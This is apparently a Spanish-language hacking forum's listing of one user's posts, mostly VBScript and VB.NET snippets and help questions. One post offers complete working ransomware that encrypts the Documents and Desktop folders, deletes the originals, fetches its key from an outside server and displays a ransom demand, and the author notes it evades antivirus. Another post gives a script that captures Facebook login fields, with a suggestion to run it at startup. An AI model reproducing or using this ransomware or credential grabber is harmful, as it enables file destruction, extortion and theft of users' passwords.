      num2 = Mid(num2, 2, Len(num2))
   Wend
   
   If Len(num1) > Len(num2) Then
      r = "+"
   ElseIf Len(num1) = Len(num2) Then
      For x = 1 To Len(num1)
         If CInt(Mid(num1, x, 1)) > CInt(Mid(num2, x, 1)) Then
            r = "+"
            Exit For
         ElseIf CInt(Mid(num1, x, 1)) < CInt(Mid(num2, x, 1)) Then
            r = "-"
            Exit For
         End If
      Next
   Else
      r = "-"
   End If
   
   If (x - 1) = Len(num1) Then
      mmi = "1"
   Else
      mmi = r
   End If
End Function
'-------------------------------------------------------------------------------------------------------------'
Function RestaroDividir(n, m, op)
   Dim lm, ln, r, x
   
   ln = UBound(n)
   lm = UBound(m)
   
   If ln > lm Then
      r = rd(n, m, op)
   ElseIf ln < lm Then
      r = rd(m, n, op)
   Else
      For x = 1 To UBound(n)
         If n(x) > m(x) Then
             r = rd(n, m, op)
             Exit For
         ElseIf n(x) < m(x) Then
             r = rd(m, n, op)
             Exit For
         End If
      Next
   End If
   
   If r = "" Then
      If op = "2" Then
         RestaroDividir = "0"
      Else
         RestaroDividir = "1"
      End If
   Else
      RestaroDividir = r
   End If
End Function

Function rd(n, m, op)
   Dim ln, lm, r

   If op = "2" Then
      ln = UBound(n)
      lm = UBound(m)
      r = Restar(ln, lm, n, m)
   Else
      r = Dividir(n, m)
   End If
   rd = r
End Function
'-------------------------------------------Funcion Multiplica---------------------------------------------------'
Function multiplicar(n, m)
   Dim x, y, r, c, s
   
   ReDim a(UBound(m))
   
   For x = UBound(a) To 1 Step -1
      r = Join(n)
      s = Split(r, " ")
      For y = 2 To CInt(m(x))
         r = sumar(n, s)
         s = Split(r, " ")
      Next
      a(x) = r & c
      c = c & " 0"
   Next
   
   s = Split(a(1), " ")
   
   For x = 2 To UBound(a)
      c = Split(a(x), " ")
      r = sumar(s, c)
      s = Split(r, " ")
   Next
   multiplicar = r
End Function
'---------------------------------------------Funcion Restar-------------------------------------------------------'
Function Restar(ln, lm, n, m)
   Dim x, r, a
   
   For x = ln To 1 Step -1
      If lm > 0 Then
         If CInt(n(x)) >= CInt(m(lm)) Then
            r = CStr(n(x) - m(lm)) & " " & r
         Else
            r = CStr(n(x) - m(lm) + 10) & " " & r
            For a = x - 1 To 1 Step -1
               If n(a) = 0 Then
                  n(a) = 9
               Else
                  n(a) = n(a) - 1
                  Exit For
               End If
            Next
         End If
      Else
         r = CStr(n(x)) & " " & r
      End If
      lm = lm - 1
   Next
   While Mid(r, 1, 1) = "0"
         r = Mid(r, 2, Len(r))
   Wend
   Restar = Trim(r)
End Function
'-----------------------------------------Funcion Sumar--------------------------------------------------------------------'
Function sumar(n, m)
   Dim lm, ln, r
   
   ln = UBound(n)
   lm = UBound(m)
   
   If ln >= lm Then
      r = s(ln, lm, n, m)
   Else
      r = s(lm, ln, m, n)
   End If
   sumar = r
End Function

Function s(ln, lm, n, m)
   Dim a, b, x, r
   a = 0
   For x = ln To 1 Step -1
      If lm > 0 Then
         a = CInt(n(x)) + CInt(m(lm)) + a
         If a > 9 Then
            b = CStr(a)
            r = Mid(b, 2, 1) & " " & r
            a = CInt(Mid(b, 1, 1))
         Else
            r = CStr(a) & " " & r
            a = 0
         End If
      Else
         a = CInt(n(x)) + a
         If a > 9 Then
            b = CStr(a)
            r = Mid(b, 2, 1) & " " & r
            a = CInt(Mid(b, 1, 1))
         Else
            r = CStr(a) & " " & r
            a = 0
         End If
      End If
      lm = lm - 1
   Next
   If a > 0 Then
      r = CStr(a) & " " & r
   End If
   s = " " & Trim(r)
End Function




Saludos Flamer y me dicen si tiene errores para corregirlos
#37
hola amigos quiero crear un objecto InternetExplorer.Application en vbscript y quiero ejecutar este comando como si estubiera en la consola de chrome

Código (vb) [Seleccionar]
alert("document.GetElementById.('elemento').href")

saludos Flamer y solo quiero saber si se puede
#38




Proyecto:   Ghost Killer  Adf.ly

         Autor:   Flamer

Referencias: https://foro.elhacker.net/net/c_adfly_killer_05-t455465.0.html;msg2080233

             Por:  Doddy

    Lenguaje:  VB:Net 2010     

Descripción: Basado en el programa de Doddy, este también decodifica los enlaces adf.ly pero con la diferencia de que este tiene un modo de trabajo invisible sin la necesidad de estar llamando al programa cada rato este a párese cuando un enlace adf.ly asido copiado al porta papeles con la decodificación ya realizada.


Código (vbnet) [Seleccionar]

Public Class Form1
    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
        Timer1.Interval = 3000
        Timer2.Interval = 1
        msg.Visible = False
    End Sub


    Function decodifica(l)
        On Error Resume Next
        Dim web As New Object
        Dim i, f, x As Integer
        Dim a, b, t, code As String

        Err.Number = 0

        web = CreateObject("Microsoft.XmlHttp")
        web.open("Get ", l, False)
        web.send()
        code = web.responseText



        i = InStr(code, "var ysmm")
        f = InStr(code, "var easyUrl") - i
        code = Mid(code, i, f)
        code = Replace(code, "var ysmm = '", "")
        code = Trim(Replace(code, "';", ""))
        a = ""
        b = ""
        If Err.Number <> 0 Then
            decodifica = "...:::Error En La Decodificacion:::..."
        Else
            For x = 1 To Len(code)
                t = (x - 1) Mod 2
                If t = 0 Then
                    a = a & Mid(code, x, 1)
                Else
                    b = Mid(code, x, 1) & b
                End If
            Next


            code = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(a & b))
            decodifica = code.Substring(2)
        End If


    End Function

    Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
        If url.Text <> "" Then
            If InStr(url.Text, "adf.ly") Then
                Resul.Text = decodifica(url.Text)
            Else
                MsgBox("No Es Una url De adf.ly", , "Aviso De Error")
            End If
        Else
            MsgBox("El Campo Esta Vasio", , "Aviso De Error")
        End If

    End Sub

    Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
        Clipboard.SetData("UnicodeText", Resul.Text)
        msg.Visible = True
        Timer1.Start()
    End Sub

    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
        msg.Visible = False
        Timer1.Stop()
    End Sub

    Private Sub Button3_Click(sender As System.Object, e As System.EventArgs) Handles Button3.Click
        Me.Visible = False
        Timer2.Start()

    End Sub

    Private Sub Timer2_Tick(sender As System.Object, e As System.EventArgs) Handles Timer2.Tick
        Dim t As String

        t = CStr(Clipboard.GetData("UnicodeText"))

        If url.Text <> t Then
            If InStr(t, "adf.ly") Then
                url.Text = t
                Resul.Text = decodifica(t)
                If Resul.Text <> "...:::Error En La Decodificacion:::..." Then
                    Timer2.Stop()
                    Me.Visible = True
                End If
               
            End If
        End If
    End Sub

    Private Sub Button4_Click(sender As System.Object, e As System.EventArgs) Handles Button4.Click
        Resul.Text = ""
        url.Text = ""
    End Sub
End Class






descarga codigo fuente mas Exe: http://www.mediafire.com/file/v02ew6doec1y2dj/Ghost_Killer_adf.ly.rar
#39
Hola aquí unas de mis travesuras con vbscript que me encanta y es un código para obtener lo escrito en un campo de texto de x pagina como ejemplo puse la pagina de facebook aquí el código

Código (vb) [Seleccionar]

set IE = CreateObject("InternetExplorer.Application")

IE.Navigate "https://www.facebook.com/"
IE.visible = true
Do While IE.ReadyState < 4
Loop
while IE.LocationURL = "https://www.facebook.com/"
   u = IE.document.GetElementById("email").value
   p = IE.document.GetElementById("pass").value
wend
msgbox u & "        " & p



pueden probarlo si gustan y seria mas divertido si ejecutamos el script al iniciar la pc y si el usuario ve la ejecución de Internet explorer normal y rellena los campos  jajajaja

saludos Flamer y lastima que no se puede usar chrome en vbscript
#40
Scripting / Como manejar números mas grandes en Vbs
15 Diciembre 2016, 18:57 PM
hola amigos tengo este codigo en vbscript

Código (vb) [Seleccionar]

x = (255^11)
x = x - ((fix(x/5767))*5767)
msgbox x


el resultado deberia de ser 3960 pero en ves de eso me imprime 0 en el msgbox

anterior mente usaba el comando mod en la segunda linea pero me resultaba error así que use esa formula

y si en la primera linea remplazo el 11 por el 7 si me imprime el resultado correcto, pero yo quiero manejar números mas grandes que el 7 y el 11, y mi pregunta es si se puede en vbscript

saludos flamer
#41
Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código


Código (vb) [Seleccionar]

option explicit
dim shell,fso,document,f,password,desktop,id

set shell = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")

document = shell.SpecialFolders("MyDocuments")
desktop = shell.SpecialFolders("Desktop")

set f = fso.getfolder(document)
id = f.drive.serialnumber

password = Contrasena(id)

cifrar(document)
cifrar(desktop)

msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado"

function Contrasena(id)
  dim objhttp
  Set objhttp = createobject("Microsoft.XmlHttp")
 
  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  objhttp.send "id=" & id

  Contrasena = objhttp.responsetext
end function

function cifrar(ruta)
   dim carpeta,listfiles,listfolders,f
   
   set carpeta = fso.getfolder(ruta)
   set listfolders = carpeta.subfolders
   set listfiles = carpeta.files
   
   for each f in listfiles
      archivo(f.path)
   next

   for each f in listfolders
      cifrar(f.path)
   next   
end function

function archivo(path)
   dim file,largo,i,f,b,p,n
   
   set file = fso.getfile(path)

   largo=file.size

   set f = file.OpenAsTextStream()
   redim bytes(largo)
   
   n = 1
   
   for i=0 to largo - 1
      if n = len(password) then
     n = 1
  else
         n = n + 1  
      end if  
  p = asc(mid(password,n,1))
      b = asc(f.read(1)) xor p
  bytes(i) = chr(b)
   next

   f.close 
   
   set f = fso.createtextfile(file.path & ".crypt")

   for n = 0 to i - 1
      f.write(bytes(n))
   next

   f.close
   file.delete
end function




saludos Flamer
#42
Dudas Generales / data base de password mysql
19 Noviembre 2016, 02:36 AM
hola navegando en internet encontré esto:

http://www.mysql-password.com/database/200308

alguien de ustedes ya la había visitado o sabían algo

saludos flamer
#43
Scripting / Error con la funcion ord en Python
14 Noviembre 2016, 23:55 PM
hola soy nuevo en este tema de python he reducido mi programa hasta llegar a tener una sola linea que es la que me marca el error esta

Código (python) [Seleccionar]

print ord("A")


hay me deberá de imprimir el 65 pero en ves de eso me marca error no en tiendo el por que

saludos flamer y podría ser la version o no funsina la el comando ord en windows, aclaro nunca había usado python
#44
Windows / Se apaga y prende la pantalla de mi pc
18 Septiembre 2016, 19:35 PM
hola amigos este tema lo expongo aquí porque el problema lo he estado presentando desde que actualice el windows 10.

sucede que cada cierto tiempo ya sea una hora o 2 e incluso hay veces que a los 5 minutos sucede que se apaga como 2 segundos y vuelve a prender la pantalla, pero no se pierde nada, ni se cierra ningún programa sigo en el navegador u otro programa que este utilizando.

no se si sea fallo de hardware no lo creo, ya que esto me a estado sucediendo desde que actualice windows 10

saludos flamer y tal ves sea hardware ya que últimamente se me a ido mucho la luz, pero que se dañaria
#45
hola estoy tratando de crear un archivo similar a este


http://www.mediafire.com/download/qyors7vpzr9atju/flamer.rar

es la foto de flamer le he borrado la extensión y lo remplace por puntos y cuando la descomprimen se crea el archivo flamer.....

y mi pregunta es como logro hacer el archivo flamer......    sin nesesidad del winrar y en un lenguaje de programación

intente esto en vb.net
Código (vbnet) [Seleccionar]

FileCopy("e:\flamer.jpg", "e:\flamer....")


pero nada

saludos